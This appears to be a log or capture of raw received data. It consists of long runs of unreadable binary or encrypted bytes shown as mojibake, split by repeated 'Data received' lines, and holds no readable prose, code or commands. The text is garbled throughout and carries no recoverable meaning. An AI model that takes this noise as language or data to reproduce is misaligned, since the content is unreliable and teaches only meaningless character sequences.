)åІ‰ðe²t”øûâúªÞ.QŠ¬¾‹ØF‰0ëZM·gí—Ƽ²Ïžõs̀Áméj5'|þ1¹·l11{ǘjæu%õ!0wéä#),RQÇ_võÝí›p%o4yÄ®;Oa¢ÔEñ˜ÆïQZ´÷©ÇJ@×׀¾È;PDàµJ¼9\É`¯±t/c¦àâS h¼¯œ•£>Ðݒû#UÏÀ nóEB__Va÷ç*öÔFº¬ñi\°štÙ ›ðͨ¹.›ÍRïñE8W7×Ï…Çkºã°—C¸§C^ˆJ2}bêÁ$?æ P+§(Hm-—Á¹µŽþ‡H8Z`âÇ#¿B8N?dµ@l Š3>g~!Æ+Ýåç¢0iCŸÂ“"“ëò'ï"ýªÎØ]ýÍÙ+•™(ÀÎ*‰œCiÙ¡AȘx0"PƒUèG:½vØùýŒfßXYbëJþ^+G¬ÓGß4‘Øsz¨­D΁H›IЇCuÇ ›½ß³:lÅiû_\—sÜuMd’±¹7eßOÅ8`ÓÐ(‰€X69ÐÝë¸Ç ¾’~_í÷ð®Òq¶t±±?íÎU`nÍóX—o•ÊµTÑÄùÙÄV˯é›Nf¿”f‰é 0UìOãx] âIa– +}Wû#‘…%Ñ>÷ Ñ$7¤ïÑzS$Àó€*ìêB¾ðM²ä'¡ÀüÜDí1,™ÃW‘`¾«:³@X
Data received x{Ή›Ž«¯'¬Yg–MDçéÃ.9v¥«é³’Š¬îmWÿ×ÅiÏÍ؊‡Tӆb|àS×ATûöáêJð$~&'–füaµþqïI—F.TÎÆ6ïŸÆ¹‰>¹S¿a¯ñ壋TÁ?ŸäX›ñ†·¿C›)xkgnyÐ(3r™-••x¾cpµ½žm?9²L9›ÎS´z‚ÈC_™ù+~Áó÷jå‰FÛýNðM*Bý›×Ð×-®6|'ñl)–Q´¯ mž$ô¡Þ’Ö`àEV]õë ª0›ìÈ&Le]|`ã'HÅk寃HÝq¡<be/Š|2Q„ðóEøl =¥R~גªDÛ´Þlð†±h7æI¬ ^Ê¢ kÇ UبôJÍÛó´SÈ©¨”yrÍ<V'Røâö!å{]â …Ç4Ä3ÆJE}[Ó¿ã‹Å6r ð)Í{_¸Ô¸% þ²Öú¼é±¬¡Æ[zìj$…fh¾Ðø”¡œ¢‡À¤ðŒ{Aû¬.;”ÜYå,ßÕó8¨Zë –Ûn+H¶¨³m!¤­?·Éo*ÉQR›’³®î‡Ý>B±e+U›"wœ€!ä°u@wäaFŽÀ¡%Ë.³Ã‹£}Ü&S„Y-<5s±D³÷_,¥ÅNË 2\þ\ §žrà‰L%?uÓ^×Ýç’ùíô{ßHŽêyì(tyŠ±wJÕÀƒ±÷ ëôzE pòë¨áÔÙâš8fST=+e©ã+EŒjÔÆõ,…—Åÿ¾÷ŒÍ^þSíágq.à±_0BÍ\€ÍKn±b^''T¸bbn¿gÇb §¾íõcá„îô$\+L7ÔJ^Ý÷“hK`Z y…ë¢I›šÐñ@9!«Ùú ¬ñú¨Wû/d.|Á0›Ÿ^U ë¬ ³ì˜Qóÿd$žä§É5tbøÈ4¡ýð-¢'*Ž^ €¼`ª¯^j,Ž9ÖjI0f“þ?רU©\ÀOPPžRuÇð¿æËn"ñÊf(G J·ú^Îb2ÌÉú«ÌÚ} {{ô.åˆ<üžD£šlË%&ëbŠªÃFtámëüyÁy—9~&©¸{Ñsÿ„«ñy¹eºÜ³?ºë¾K»r9çÞ`ðšn Æ~1)Öbõ-_*˜%¥ï³1ïJ>ÌÂE÷灠÷ÈxVíÍGž£Ç4ˆN”ƒÝ‘äÀ/ßîs¿Søy/‰-—Æ¢’œk€ u º“Wvì-ˆìí7_óþׂãaœt‹¢ ?ƵÆòñ¹þ ¤›)÷w ÷E°Êx¬š f…Qj·Û®§ٖ½ÎÒþÕWq.‹F…¯…cǜD¯ÑîN¤;,ûÈ–Ç (KBTÇ PižÔš¹\Êëf*Rè[ø(:ªl(௛êÄç•ÔñÌ®ãdG÷'1;0/Ò²ß̶B,0I‹ÁÁžüùx8l;Ìvçma¿…çA7”£Mijg<¸ecª?ZQ€¥œ^vÆ»Ú,å•9D¡¿“:„½C÷½J·ÒJ¢ÀK@‚¿¿?ño5Njîw!NÈ¢££ë4~P§¼^?¢èùÿžª€i#¡t¬ì]¿þS-ÀNÀMÄ`7ՙ¹ªºÈJޖèG¡‰•Ìã Só;E›¿÷, ܍æl±ÍgT5(Ù=O‘¡åR©%±5 n/ÑZÅØX( ÒKÅçûìTŒdq»ÍÍBæM®jғ§@'Ÿ::½»¥aZÖƋäpÞѺU<q-÷šâ]­t
Data received ÿpY@PêI±ƒIàË7[`ûþ×&<c¡?òbué͂ÓìúÙ¡0ÑæÒä†Ú_n͇&Äá¨Bۀå~ދÉËådâ,Ù%g^/‹^6fd«öôR¡žÉVM¤> ǟ¶8VÙ43‹E·ÝțyÄãWÍqQÃ$0yì]„È#VÌë¡y0œ¼yÕ³q4´§5­_¾¨Qdt(kªbJ9(¿Â»ÎNâ<­uÑp¹MÇ&Šæ}œ£Ih!­>ýtpaB·dÚÃ˾µÑAëø6Cú^Àø>Åc¢L±ŒU„ÌG Cªü:p~õ͖d=n¤šL׉}%1·Ž<2pkuOùpÍð¬~U:óÀd<  Ûÿv sŠæ¨‰‰Èg’&üZ"¯§øן»Ì¿'†T™ ™–Ærå²påž¼*kÖ¨Þ¶(“÷«€rÛJF•¤#=é¼½2ùyÓnN„ÔÅA ƒè>äFX2ñ¹ß»?j[`°+=‚Ԑðu¯cµÛÓÓÅDCzƒŽÆ"^ÔþÝ|ùj ù2WB6¾&Q¹ì2uÇ=)áµÙ§/è-…òÝÀóní ßá}WׇOVp T_ ""&oýÔ( ÿgÑԜC|҅G"÷S²‡j¿50~Ú²ßF—›§—:‹õÕ$…1°ñ²½e8ÁlBøŸ4I–ð̞›¢|i™tY¸žœ‚†ïžnà¹Ä•ëÎý!+ HÀÒñ]B"FÜeóÛ(óÑVzº» &$ƒµ{âƒóì·½··Ëéß,†sCórg •8ˆ×u%c™¯.‰S¶Ÿ¼ ›³ÜûÐ`–D1‡Ž‚Ãp{9 m!vPN©í‚g´ÂN‚KŸˆ~ÜHºßX¹B¬Ž³U{=Âtm%™`TÈ;†Ѥ<§Îùo‹N[áÒ瓟ˆ ɈÁ©àOïÿUXC9ô͆äÈ{Ô@x {]E¼Ee¡JD ÷cB•BBnï½×®`Bì-ôc±ÂJ"ä:ªàEғÑ”Îj¢¦§ lõUº)4¨Vº&CŒxX¬LüÜW.|‚Û­>¥;„ hÐ * À.?“b°äCÉ­b? àø(U×ãxAÈ]×$Y.×\²ÕlN®ßó k2³ßZÇ7e§Õ)cR€A«¡ì`¦DÄüp·˜mՇAµý¿9iZÂëž$‰xsÿë6ï.2/×2¤å]—‚ «°+k-­ŽBŪï²—&¡Úb)ͱâ~MHY×nŠ=@ò2tX¡/Ñ¥©‰`’Ã_5lŸMü[+ŸaëÔM^æjº‰}x¿jT(ûÆ]ª(Ïf06{tic”#ub;íßy ÃYlŠÀiKAö>g‚þ‚Ý0“Ö~d­Œ’¡ ‹ ô Z¦ÎžÂŸ€ÓÉ­¸3ñÀª &ó˜?"Ä$•‚÷Š¡ZIE©ˆÇ¹­’-û|‹Çs`&á(’ä ó)úsr'Cåõ=@ÞTÑ;¸‘Ð*¯yk‹ËcPeÂèÂm*çÃ+ËÐK¹2¦ÍaÍÜF­ÕL([Ãëž X÷lÈ¢¸Uç´zÈ#¹³d¼ýÉôœ"é~´F¼¤;5¾ÙÁ«„tœ— êÉh˜ŒW‰iˆGöž*¡¤”KÔ[ãÀ¬Äön¥¦ cÎ 0xö4L7Fa¿Ø«ÿÿû,Ö5 ][2‰£åxÜq6h<žöXhw'Âi, ÷. ZeÂþÈ^/ð¥=Ìê·Þ`°ÉFY§êºqU­×®áœ¤å®è\Y
Data received 4 ï-ëâð:دL Á#ƒÕë)"¾²?F=Ä"=–|Ý9¶Íþ ÝQˆ{ê•p ¼dôA5o†­¨ÓŸ p1qwÐÛJ#§À[֛ E Š­ú¯1ÿ6 ]ïΏÎ{þ¼%ø[ø¼ŒÝÊý©³³ž%_JÙ1ýrÜҌKÏJS岍h§"™B9;f2ÖzGq¾‘¯XAŽ÷îüȓÊ2[ O]-Uƒ=ä@‰Û³áéd}鈜‘žA›ø輈j³ô¿ä¼~Ĕ¯¦ŸŠ^ÍŚ"rJ_̄H™{½l½[bö•žCèRJFڞۨ&{š=qiL€üÀ«žÁ=Å¿Æ͒­¡IäÕ>i«ñŠð*g¬Þ.ôD‰™ 36®Ánþ¼6Û?` ¡ñl«ö_0Ò3¡º7é‚Ñc)í=²ÏS3S kÅà׳#TD_Y·­6ސëVr2sø=«=?›“ç ù'׉á¼ÛÑScÎ|ªÇö-€\H!E[,ܔÜ8`á‚h¹ŽÊɗ·ÏnÝï ÒÒ$£áå<Ð@bPd3„f/#e¥g´Þ4Ô G 6—bo¼ï®ië8ù}๫`â?(4ái2D²,DŸÊŠtŽƒW-—ðñ%[x>¿Å/±hŽý¢Óôvê$ËÞA™+߉·bDÏ4R›/ݑ–tª'Û$¶€¨Êçj0I, q+r6‹Ú‘Ñ~îG­X§–‹¶uuíØ4rÎ3·rá‘­DU˘7¡­b.&Ô}3m ÚwÓ>‹„ È8…R\Gž%3T“W"A2$¬Z³–ŸÁˆ5÷ñE×ßáHeäî êèJØ Æ^L¥€ªÝ¨ä­-þ‹óØwZ~žvï¶Y7Ç^*ÈxW/ˆêFWðáDnÆÿ$ªë‡YÆ?Å×.¸$S$‘Vké(Ú%ÖÌsàmë6d£Ÿ+YCâ‰/’åYà#d ­œÝ#y’/¥ð‰é€ÐÂ"{ûY„Æäõû/üž½³¤±ëw°Ž¹³0{£LË;y(ûWùŒc ‘«¦ã®”!dØ׿mÈaQù-[ýTp¿…Lâæê‚Áƒ "ˆŸ“EÛ\ÔÍñ ôíKÊg\¤ÿiÖTÚјB ^+xT"%ëç‹:AO‘›>j$ûbXšïÔd؈5˳OOÆÝ [—cÐf1ì›62ÓĮǂÃ&ó“žË¾ÞQMŸÁ§¸?¯kP•û¦†Ëb*ó-Vû¿ÛÈ9ËhÑ|ˆRXˆt("½¾~2(äO؂া[èH¢N¼m³°5†¨_ë^>œRý#ã;N(]‰<ªVxEs‘ï1Ü&ò¼ã×­Ò¦?헤¤Ù§Ã®®wõÝ÷‚@æ#wÛîŸë Jd¼·55ý =,ŠzÁú;úªÉ-ÿc#Ç¡bìWbF·W.IöÐ0bïö°ÅîÆ (ùÃû÷Ô@4óðâŸNu©¨;kÊwl²ƒÐ{ÖÔxO ¹´€¸ÙáÚf€%´õ(ÀÎ1F耐Š1躡Ju¥G¬Š¹S“Æ5‰·=FzeÆQ¥œŠKBã½¹¯ñCô @ˏ¡x*HÑ=, 9ƒ€9cà²!|ü­»Ù܉Кþƒ©;õºâËÌéôõp„Ò KŠ (žÐÕ®V=XŽÙÑٜš[©‹›ò"y…œK$ßé/ ¼éSh¢œ;Ú5rêÏÐkŸèé¾½ú$|ÖÉ·S®|ùbšWuÉ3Cï$¶´Ÿ^!ŠR7žo)Dº¹?NNÖ $ɚ\•±¨EŒÂ£2Ú ^±
Data received Ò³£(J˜y¶×¢ïùˆäAÏÌ{?1æíԒ«iYš<w!¯ò%%`–Ï¢ÉuºdÅ4u¨kŒÀ­Ÿè¥ûÉ«O&DyáV_¡/½Kª¼:¼ÙÈg3À–=2™²ƒäÞ~ö@™+íüÄ ï9‰™Ç¦­ê錑mÛ¢¡±fŠJåÅþ>N g •¢ÎÚXÙø쟛òR­á*i±›46ªÈöSë™îäðþÅä2•ÿ¸eÌÑÅdä8 â7k±ŒM_<d9ïùӞ'1¯Ÿâõ$Q#Õw õ¦ž©ƒ*pæ@C­„ßrg¼aâùä(([)€SQ‚ž½Þµk2Wµµ ÃӞÙê®Oò[Éa{yX:kÞN©EÌÉ5w\‚"ÑMØ@âo2a(€:1I{›ýŠß Óç¸Ñ°$ôáÚÉx_é±&¡PÙìá Rê0ÓZ·ˆ••×!b¤a½¹<ô{¸Fën<kíp‘íþÔy*Ü|3››èÒß<­xªƒ‰ÎH°úxçÄ]žz#ó­ë>½;ÐÑÎ↎-#ÚÆK¦¶F ðeíù–X°Sò}汑àºȧosߖ ˆß7ÙeÆè}ºŽ5º_¼Ǭ«#„ÌB[KˆG8Ê;›6³C¼Õ°émò~Œ6Ä¢ì±'™Z¿É šmÏý˜yV\º· ðºªKæÐ15"Sª¡©Ð€˴ɒDýq@śñn¿ÉÄCžæԟú"jߣNõ®ëØhÑkÄáª+¸‹ÌÆ°tUrhÑRÁ™Py_M²íBLN˜¡g!!‹Uîhœ‹÷A3¤}ÄÉq*‹nÀt [EìÂàî¾ZӖ/©ëОI#‰<ÐçŽ[÷„ÅÂfž@C¿uÌÌV¿£¡3ñ-”eGBO`¶ß ôk\ñ7.–•ZŠo>m(¹79—½:Å÷ʘBi'þ®=Ë÷€CóF^~KÃV,/°EFbj“¸~z\ß鿏{HÏ-9NÜ Ï)‘›z;>C\bÕ|ÛºêñNj¡<õg˜ù{’3{÷±)“$ŠÖ—Ó„Øc¼CŠ‘/îöÌX8́Ÿ0£»™û çìÈqÍT*$«ÔùÜíñ¼óΣfó^èT£áŸÔ×b—½Ø×S‡Zlä¬Í$М0Uÿ¤Җ»µµ[s¢Ùý9¸?=Oñ³[˜UV·k)JmmòaZEtç؛ZÐ ²¯2¼•‡ñ½hoÓbƒsÁSc´Q–ƒÈ)Y=û)ýñSµ,¤äQaBÀŠ¼'§tVš~Ÿ™šœxçŸùâ¿"×&TQþæ0ÚìêÙː@‘Ýì#;ëÚ÷ŸÆkR'“IM¢²Ð!ç㨏ì‚ÕÖM¢2»@ÀýH™¦§Ïþ°^£gO9ÑÙ—˜fEâŒÄÇé ú&…'!Ȁè®­Eh9u㵑¤Ës[€`g'êâÀþ°²(JJ öÉ+Æ—Ӝ’r¨¥I5çä IN»¨àr^7]uL Ε ËYž,hOc‡X‰ÿóFïçÆÑ ]â⊠S¶µÕ¡§¯óí%šÄ<@ 0æ{¨ˆš4¼R½Ü´tP¼üèQò¬g¹ú9/¡s(!.¢\ÒÄ´x®ôLç¾ù¤—Ýžg}ó™§ÖO“h©yÖë_ %³ÌbrÀ¡7Ð}«hñ ΀›>VßJ^JþGšnV0p? i¤uNU¬µrd–»:l‚!^Wø˜[8{u°Ú+*+‹QZº/ƒ¼@›tQ±Q(±Ö×ç
Data received oÀË8º›wÅ2…¥6nö·»¶û•&ä½ðIÔïI¾»W1O¥ŠmáU®nVñÓ )õøÙº­¾}(Fùkzr¥2Ragè´êz³uÔ±è.§gqÌp¿±«=õ`\eljE[©e–j0;·ï7gŸßÜÿG´ÌEQ–DLÙ=jÇgÀR¨.0ßóC½˜xý÷mï-Õ¼ˆƒ´»TRìoV¯âï‡4è÷é1}ÇÂü‘±pÝ%4=Êß*Z¢§"â–Jçš(ãI5ÅÜÅ?œcí »„w™cÞªÜâ%!‡äâ|Ñ$5—ZÙ§&Mß=ÍÌNÆϜĹ 3Ÿ¶‰š²œ´HÁ­D̎ €.H~Ü(’WÿêÁûÅ;vě9pŽ&D2)2ÂmÀùõFÄw|¢×º*¸bys%,ÑjÙâ¯S¢.’¼^©­ûùÄc³ ÁÔiÃÛ`¬S^oÊëÄk9Œ¢© ŽdcýEÌðÿUõu-Ëo›7}÷éÀ‘¨94Áú׀k}Ø9!ëÎz_ÃÖÂSB~]{$¬JL) º­D®H[Î¥pŽ„h¹‹Sæ¨à¨¾òÝ;¦;–Ä(fv6¤+V±82ð ú¾ a{fâ2u·KËö¦pFG¡Êˆýë€`ÿ£Â|“w +jØgJ«¬úðåê³<…%žQì‚ÏÁA?Õù¡·Û–'Y¢"¿} ׁŒ‰õWÂ&’xÐ=H#Yt¢ì½]4U¤«czmm©N·TˆìþÄÁB›»E֥߲æâŒ0H ñò‘Ƨvb üQ"2-†´˜C9UøáB€lGžIìIÔéù€õ"j€§ÌNNãPámäó&ãÐlëîÅ—þ÷³3]šmyü“»å¸>ʌեèÐÜÑ t4Ý e´üÝöӞ¥çŠ!C @?bäõT$&*žÜïÉé½F4‚kP©e¿AY9„É/ò ‡ÿ²Íí ´Oýœso=öñ”§Ž(”(æÇI §Å j)¢(XT×XŽp³Q¤É. ²"0j+VšïžK:%JŒf.O¯Syà9î˜íc]”T¶a‰)tvÍà`§ý;сMtC›ÙáPn–ÐïŎ 4Zª]A·*x _íŠz}®Cø‰”ØglÜMhó"©Î7?TçócÊ%'Í%ô[Aiú Â{¡.n@ïïÁŠD ¥ý ‹ -nøi­'$¾öôªb#ä{&ú(ŒX˜­LûÛs=†W»p:…OÙ§…XµSŸ 5Ë o#ÂI#þ/ƒDôåø,tHߌÙî>QÃÃD|1§†K•ì±ý”¸ŒëÑ­Ñ 'æ×RQY*ö[S¬ÑÆQÒ­ØxÄûZhs_½&ÖD,þ: ôfÎïì¢þ¿§þDÐÀy:#› &M\¢>;- 8Š|r¤Š,æPœ93¶ˆÛYÝm"aû6 ì­gˆÖÖ)UÉçô¯Fn‹·¤±°Û ûôÈ7Sõ‹&oÙ!h$BcTݟ:a ò½ÆssM´ØÿVÙT݄̈}Ϭ·wØ©i–í£hF ën©eM2:XMÈ8~·öfK”¡î[Üf€™¯\9®5’æó*,áýf¶2°Þ¦¯¥—YQ<†°$Νö^½T€ºÑ-¾Â2÷ð|ʶøh)5‘ßq½¡¶[AŚ<·ۜ$Ž«¤€¬½>þp€eK6ä9ÔÖ³Xî#„~Ê\Ùòü¯:áãw´yDx œl©¼«Â¢?¥ÊË¢®€nßð©­hÚåql®=ãtu…’r¹‡Õ|ªÇ~®S$žÆ>‡gŽvÎ
Data received +)ƒ!;Y=h SÒô =­qäÛxZ8–(_šçøÂM|ÍrªÂù@WÉ"lþ–ޞ䌔iévÛ°›ö°å¤Çû,Yoym·VQFB³…uðú#Ê _àW„V#q89¿[̉ x¸)G~alƒ~‰³×Q-«V/=LKæ­Eyøtpb»hÝÕ#”q:’.SýÄÕeHɘgf Lž'sã\?²µö“ï›ÎÚ¡÷ÂÛyèõws9–O¥M–%ŠGÉ3Åb’¾;ªEó; ;1NJðH¸N ¾óŽð_°ÒÄçU¦ÓTΑ6rµ¿æĐïc«­å%ûí%^‚DªÇüµh{N=×(»–æû³©Ç »­1ÓLb„c¾{’Ìæ(ÃDy!Ë蠌£86ñ.HOB”‹îrJoÜù~hw’ØÎÇhM¾ª¦Ø< î‰S‘x]W±½bïA–ç ÁjМ]m}þszý¥R:##¸”(¿ò‰?‹ý\L.pœ}ëFÙˆ¥ò͂*Ÿ°ûxy”l!õ˜.lØòïO~hQ«¨®çŽ”­Ì¿{†T å¦Û¦ӕd±N3ÜÀo„õücü F@ZŠ"¨8l÷†+òCÊèfÆÐ\xÃù¤õy 1ØE^¬qn8~ ^õ:›E£9Pc$ g@DH؏•Òïèú;ÙÎCANÒ\ħU6éÚUÖ²_± ®ð’ë×2nHù­É°ï´<¡íœÎÖª¹û„ù­ äJ߇]ðø+ê¦êðÂ9Tx¼*ٛÁs„  ¥íc§ð«p” S@[SÖ\¶x‘ctlË/×_"¡XpfV¸DÀäë%V(àØû?RmkMkC¹mÇÜ:,8˜OÒѾ;^E²m™î¿Uÿüs'Z×vù5<ê7î)Fùߚ†}ۑå(<¸@b„KKtD€Š?ßríɀ;èç"q݇ÞEÆ^Þ¹ÆIQ‰Í’×Í4{Ó¨‚w©’ T6Änµü<Õ _À½k7c\"À™óÿe¡¦Ï„ %íMÖÇQƒ·fÞq™½­ĚHçÅä?ý4è;ÈY®³t%]d͒٩¤%N $\,w¡îTÖ}Û±¬+ÁgG 7- .j¤*ÐL" u¡u×"ß{D”[ؘöŒûX \I ž–w„iÁz»”ðü, Ò|õ_›ËËIdÿ30z™ìªTûw¦(~êUÚÓKÜíé¤m’wáï$5ƒªB4ô`Úkcëb´Â ¤j膙ÛÒÙ7P«ãÌôU9úkåÄ©äãÔ@ ó›z9“a¨¨;l]£äܨ‘‡…à ¹ñ[Îkk¡£Æ.¾²ZœÖ>œ¡$Q_1¨[léò­Ó6iÓDÑnêÊ­~Î’Q¶]·Ít“h›¯6lÞø¬\Æ> ˆ E ¹¦2au8ØJBk.ÓOæêΨOðsMOJ¢áD6e|Li.J¥ô+z´bM’Ö]?&)ï %Y>Ð]’dÓÎqýÕø4"·˜$ö»ÐÓ^hItÇóqÃõÐc<е v?ێÄȞ˜$—u:Ñý{ٝURÉÀ“éÉèéŒÑ<E±Óß]h9öèkÆù#‡ˆ%;>àžˆ0C óg;Ÿ?”Å…ž†-ŒÐ¢ê Ûg*=1őÀZ?BtvB©Šøw ±sAûmò‘<Ê+o0MtW²éØKÉÎhÙZž³'¥@¡Ÿ®;êË ‰yܐ*h@4û¸Þ5·ÛQwý#ýÚjõáê/ fîUøQ&Ç鉭¦üiTÈÀV?÷§ãú
Data received 
Data received ^ÍUãÛ3ûI¬!Ä ¢&ÃÑA{œë´MìâòlFµÓIm)ÞP_ÜZÃmÙ¯,e‡»¢°P´Îñ[¶Û•5uïR´CìàjM)£_{öuÙËͲL…(MP„¸ux¬}˜Ì<ÊÚ gÐ×B0jå™Å%j|ë÷>ÙmhcãòU<a3{zhur°šœ¯ àóâ-ËJF¨^–t ÍPýM¥”±Í5àPGxèâ"ü)ãaÉÚS°MS?ÙÖçžþ!¬›êâh^ö÷SÄ!Ahš³ã“ÇEk¼pou•1•°‡?†m-ßἈdÅÐ˽œ²ǀTu¿zÏukLä÷‹ÃLíÎ:ºJ÷; bϑìÞ
Data received ªI"x Šínï†'Ò¯c†·ºßÍ3«à;¹‡MO‹¶x‡óY–ç‘l1Ñ ráq-ÞZüê§ÓN‰Ñ>äðê¸ðŸÑ$äúØ­}@x<oo—Åâ•[µàB'ÀÐlIø0.sÄšJϋ+XíÊ{cñÇà „ºé¸·‚³8ùaðekæà| ÓtŒvER2¯’P{…± ç‰ö €qª­Œ»âdsÿ]_KÔî}=ž+ WNú7d BnÜ‘­x‘Ü„o€¼š›<œÎ›Ö?PŠç'x¿œ±FÆÂáXåWŽ—€îñÉôÓì÷„ЮÞn2ôH„Ž¦X±m÷?bJÊíÔæ÷dò~Áœräh€bk¶dp®b$KzWTT·þµgfÈ·E¸_Õø¼`x[Ÿ±˜Î÷öJU'Ãm£h.ßmÍ»V°hï ¼h£î¥hz=îöìåôi%¹:¤µMMøµÓË*9õŠçí_ÎÔ荠]ÄKª”¨¨tI±».ÎäIא||¯_=˜VÕÚû ‚Ö=85ÀŽC|Xݬ3Ñ#¢jýÒ}ñÞ© h0A(fÝÕ0ßD[ßj:ª› ˆ†^!u¤ïzJÁЃpP[+ ïåi ‡¾Ÿ°7=²ðñyTXs x§ Ä9u 8èevë­ê(e}ÚL‡²TöI†Š]­áŌŸ–³¤˜än¦,"ûoŠÂºš kO}!Á ž¿´MJ;ëÊ8I+ԊgE7W¢’y´ˆ³÷L‚ìí®[Yu£&„„éKY|Š(¡ýê¦þ)D;¢j¸wÃ˚ÄS _âíÁ€ùcYôûŒ…v»–Sh¥\ù©¿u‡lîQâBI±Ÿã}¤£h­È9#F£õ¸º#0/‹o²R Ω…ý~èGU &åfI˜Žwÿ–tͅ¤ÀIRD´fG{¼ý¿54`]ž¾Ï8výý£ËÔF|åNø¤h]O íU‚‡•ëyç{ônñ¸¹ã@ÙùØX©¹hÜ"ѕä_ןö„¯šÁË &_ÍÊJÒì`• fÄ¢æÕºøp—1¤÷‰þ·êB,bE⟖+µT"ðU]LYÓcc‘ª®r]DäËK^au<Öª5ü1»Ë¥ÆêWèøìeºg¡¸þ“6^ ¨8O¡¢†¯U5äK®ÎÑæ·?æóÉÛRÉ/!ª@oïeuCӊÍn¶¬,À· 92ƄÂÆF?_’:ã7¹K‡œXŸ³w<­õ[SK¸¹™hãYL ÞT(æ¥>Ó_ˆ«¤VC/u)ëësق&" ûi®OT¥{|ø¾y€c͵©l 0Ë*¯%­w”P/­Èñ$ ,TiV ’KLæY?%Ù:’xZÝIÀ]B™±ðpöòw,à¼VºÑA>Ž’û7m¯M¦neÙÎ~Fœp×ê”™Æôo–ñ®öŽÍ»/IC ï_?7ªp Y:MMÓsaÜ®\h§vˆ£•›ób · ÈÔ·:PEüì#£/<”“vi\3/ +›“ïI€›‡mÀÙ.“²Œõ‹»-ïû ¡_ÿcø¨7¡º¶m-ÄØJrñÃðT•‘ ù‰5£e”¶y´nÈAßb‡p]T¨Mð5`’½N¬Ô»Ý 1£Ò¾f˜hù]!ø .î)`QolÜ\Ò_‚ÿLXǤÜ.àË8%½@Š¨´BÛð·¥ã½Å¢!n홇.f´6ÏÏ/,;<?·œi<âÚ¢_¸AA¼çüô/ÏÕI©èÈvÃV)¥!•½_bʵÔ
Data received Âv˄ɦg‘AÎ0€ïö“L¡úóx!ç± [:¡¤d=öÆu«Øáò;̅ ¨/½¹HhüùLk $­ îÂs…+_zŸ*8¨¹uÉ6Ғ%­Ô‰îÛhB¤Dðqd‚&YQ‹šsƒäoœ¬hûÙIK÷d'M;¦ùÄE™ö>ïÖV0–¢iDÃþb,#ªÑ¿vÛc`C#ÿ(aƒG7+2SPU¦5gÞåƒÚ VD3jÑqø×>Ò ü$¯Š(Nɛ÷_ø)¶£*ú’"çŒíuìY©{DÝéßeŒªÜ7N`YäDBúmQPvóAø—¤d+e¹©×£ÍŽ1Ÿ»O\Bߑþkօ‰¼ðÇå ðŠYåöã÷È_…¡ì®ž)äg&Úiõp‰»O6¿Vy°`ðËZЏ!D·×ÍØ-H6»pbÿ8õ>kX4äaâP£¡¼ŒN?é. MÉד~„gEh˜!̳!ìIqøoP±*’¨´Ð€ÎhJ»ÉkRÁÏyÆ·‰å{™˜F2èܔ‡–¹‘xg Â!QèZlò*†˜$ Ü‹]q²bC{ԟ#ð–uØ[ZM|Å¢2oBò «3‹ëéø^8M¹Î¥`.³&b|Áæ5¦ºni…ϼ=ØMJ!GÞ÷ÃXyÛ?ác_,Óu†™È¦£€íϺî+¯ û¤·¡üviºÛòCŸkqG1XO¦t»:†eâÛ7@ɚä<f· T5”Ì…÷óeû|xÐ ¤Ý…5ç`x4£Ñž¯kÏmiXŽšîOdoèAŸš6X«AåóR LS‡°Í¬ßž‘6Z¨äÏ]ºß³ß·B›^µÒ‰‹|•Ž) Íü,z1“têdWáóÊ £špŠ0ŽƒÛ«¶¬ŠÈÊ>¿¦‚žš˜uÝV6~œ¡3ÉÐ>¾×­Ø®U©d;5b pàx!§HaÎxöe4ôçúCŸpÕ=1 ôw䅧F¯mÉÓ3ÙvCø[u>ÖpCËô9‚l„ØlÂû÷Þi~Ò틨f[²ÌКÎ9‚í÷ÏãÞn%cùLjåÓñ]§Î²!òÌßÃV/£äÔ½q­[¼dX6y$,¤©ë/ìIJ¨"ò¤-Z¼¬£4zõeÏÑELPhæ­Å]qÔ9¥1ö}WúvmÁ8óÒ¢j‡ýr‚¾·'R>jœvÚ*ãh"ÿØ*äy»$‚[€6תHCý-‹E¬9×Љswa…°ò–g-_pÔÁŸ§¶›¢†(øÊÜX¯¦mµ¿£ % é£aµl ¯¼vîœÀã tŒÊҋ8ž¿Ÿ}i ™ž/1F³SClJ§ÄÄ{ Ô;Öíª¬U䔨2:úCùPß2,f¶ùú”gÈP7œ bÁÌÚî8ð®â&[Ê© à+Äè2ö\-d¸`u 4T¦‚Sf[î&a`¹œ§ìÅ.Hjyý?mšv]aéTM>ÌÍL'JÎÒ[‰f¬ÜÑÀ{fҐɳ×?8un wۈ­À áqýàï ¡‹[LA0UæùqLès%‹¢ö-²Ù¼“|M;MÌãËZÊÿ[XO¡•Êãvë¬%7ëtõX’èo|ﶹ®]CA5©'<‡4)ˆÇ¥„½3ÞéÓý]y£ž¾¯“t1*y áI¬4>ÜæŸsyZ‰›Ë$[ó†¦ó¡ýABªN9PajƪGé®Ë ïã™T_(¶LnqJ‚'º§g_(mó@; .ûK}±×4Ëgý'B€óÝIELÌ8aP>«L)…†
Data received " ò¾¦ŒSmƒöÖy- ¯³ (±Ú·–Æk7ÓÝ4¡ÜÒ«ý>¢9•{KÜrׅ){Wµª UÐuÆB-9êÐÆ:DgÕ؏7$YßÚ`6à öŽãb‡Ä‚m§Â™.vºSÿj§…Úþû#sØâ¢qC q7YOOdQ²ViÌ-<]7µÈü9T(=`á­Ü¡ÕÙQ6/ 4ð´¾ìu9¼/sêéPØ2*œ*Š×vú»Ñ„c¸Z¿×~7•Ô Û¦¹/q=vÓo¿ÜDY#"¢î3ÆJP͋%ú-ø¥¤>ª™¡û*>`xUܲ¤·dÉ&` Îÿû«`›É)Ißãæ¨w -”(|örS§RýôµvOP軾HJ†$XÄåô¡j*g“yê} ^ƒÝÀŸî=¼íWÙºsÔOVJsÿC»š>°)Å×WB(µyOb3 ¬á†·§/kÂ&‚Þä&8¡Ÿ‹ˆ <@4pªÐíÓ'xW–̾~V,%•Æ¸’€l‚t¼¸PDJÊëø1°ÃŒÊö±U†«PºÄ`¼-8‹ß*Ÿ>Dm(»ñƒ”92kÖ(¹×E~HjF©B ›x‹-ʞ襭ÓFªÃZSD¡Æ p>: |ªvâ¨C†õ³‡«ÌâTHD±38è,H—ÿ­æ&¿<±‘b¬B£'Ú~m³š¤Øš¾kqÞF´½ÿ£¶]UÒ-²y*ˆ ö?›Æ$ù Gä%fÏò –¾ÚøñIb\¿3F3…dm€˜}ûE|9".-ÒÙkDPÁ‹|“ËU\Nƒ8üÄF#÷µEþž\HÿÍü-8‚ÀÿÆrkWcþfŸÕS€¶¯+{ã;%R­Þ©«œä %h)Éu‰ë-Žˆ@Ù‡Ùvädá^§ÃÒbÏÊ]Š‚}xP'bÄåuÞDù5†?#~z/¯ ¥" RãÊ`yç•6±Óè! vöptåt“ 